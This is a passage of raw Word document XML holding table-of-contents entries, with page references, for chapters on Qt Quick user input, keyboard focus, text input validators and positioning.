            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Important Concepts In Qt Quick - User Input</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605488 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>245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89" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Touch</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605489 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>245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90" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Mouse</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605490 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>246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91" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Keyboard Input and Keyboard Focus</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605491 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>246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92" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Device Motion Gestures</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605492 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>246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493" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
          </w:rPr>
          <w:t>Mouse Events</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605493 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>247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94" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Mouse Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605494 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>247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95" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Mouse Event Handling</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605495 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>247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96" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining a Mouse Area</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605496 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>247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97" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Receiving Events</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605497 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>247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98" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Enabling Gestures</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605498 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>248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499" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseEvent Object</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605499 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>249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00" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Accepting Further Signals</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605500 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>249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01" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>Тыпы</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605501 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>249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02" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Keyboard Focus in Qt Quick</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605502 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>249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03" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Key Handling Overview</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605503 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>249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04" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Querying the Active Focus Item</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605504 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>250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05" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Acquiring Focus and Focus Scopes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605505 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>250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06" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Advanced Uses of Focus Scopes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605506 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>254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07" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>Тыпы</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605507 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>256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08" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Text Input Handling and Validators</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605508 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>257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09" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text Visual Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605509 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>257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10" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Validating Input Text</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605510 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>257</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511" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Important Concepts In Qt Quick - Positioning</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605511 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>258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12" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Manual Positioning</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605512 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>258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13" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Positioning With Bindings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605513 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>259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14" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Anchors</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605514 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
